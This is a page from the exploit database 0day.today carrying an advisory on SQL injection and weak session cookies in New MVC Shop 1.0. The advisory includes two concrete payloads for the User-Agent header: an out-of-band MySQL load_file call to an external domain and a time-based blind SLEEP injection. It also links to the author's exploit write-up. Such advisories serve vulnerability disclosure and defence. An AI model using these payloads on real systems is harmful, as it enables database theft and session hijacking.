0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
New MVC Shop 1.0 SQL Injection / Missing Attributes Vulnerability
## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak security PHPSESSID Hijacking ## Author: nu11secur1ty ## Vendor: https://chikoiquan.tanhongit.com/ ## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0 ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can retrieve all information from the database of this system. --------------------------------------------------------------------------------------------------------------- The following cookie was issued by the application and does not have the secure flag set: PHPSESSID: The cookie appears to contain a session token, which may increase the risk associated with this issue. The malicious user can use one PHPSESSID to connect multiple times on the system using the same account session. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: User-Agent (User-Agent) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT 2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html) ## Time spend: 00:35:00 # 0day.today [2024-11-16] #